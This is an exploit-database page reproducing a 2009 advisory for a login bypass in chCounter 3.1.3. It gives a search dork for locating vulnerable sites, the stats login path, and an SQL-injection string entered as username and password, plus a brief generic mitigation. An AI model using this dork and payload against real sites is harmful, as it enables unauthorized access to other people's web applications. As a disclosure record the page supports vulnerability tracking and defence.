header-logo
Suggest Exploit
vendor:
chCounter 3.1.3
by:
-tmh- & Lainux
N/A
CVSS
N/A
Login Bypass
287 (Authentication Issues)
CWE
Product Name: chCounter 3.1.3
Affected Version From: 3.1.3
Affected Version To: 3.1.3
Patch Exists: NO
Related CWE: N/A
CPE: a:chcounter:chcounter_3.1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

chCounter 3.1.3 Login Bypass

chCounter 3.1.3 is vulnerable to a login bypass vulnerability. This vulnerability is due to insufficient authentication checks when handling user authentication requests. An attacker can exploit this vulnerability by sending a specially crafted request to the application with a username and password of '=' to bypass authentication and gain access to the application.

Mitigation:

Ensure that authentication requests are properly validated and that all input is properly sanitized.
Source

Exploit-DB raw data:

########################################################################################################################
#chCounter 3.1.3 Login Bypass
#=======================================================================================================================
#
#Critical Level : Dangerous
#
#Vendor site : http://chcounter.org/
#
#Download : http://chcounter.org/chCounter3/getfile.php?id=5
#
#dorks: "chCounter 3.1.3" Künftig automatisch einloggen or "chCounter 3.1.3"
#
#=======================================================================================================================
#
#
#Information :
#--------------------------------
#Need: magic quotes = off
#
#Exploit :
#--------------------------------
#
#http://www.[URL]//counter/stats/index.php
#
#Use or '=' as username and password
#
#=======================================================================================================================
#Discovered by : -tmh- & Lainux
#
#Contact : tmh[at]sys-flaw.com
#
#Greetz to : n00bor , activebeta, Five-Three-Nine ,GabberGandalf, J0hn.X3r , electron1x , Lainux, PurpleD1amond , Sebo , Z1uX , meckl , Floo , -Patrick_B ,
#abcdef ,Loader007 , bizzit , Barbers , dev0815 , f0Gx , h0yt3r , Nemo , eddy14 , Sys-Flaw , Codesoft ,Free-Hack
#
#
########################################################################################################################

# milw0rm.com [2009-04-16]

Navigation

Suggest Exploit

Services By CQR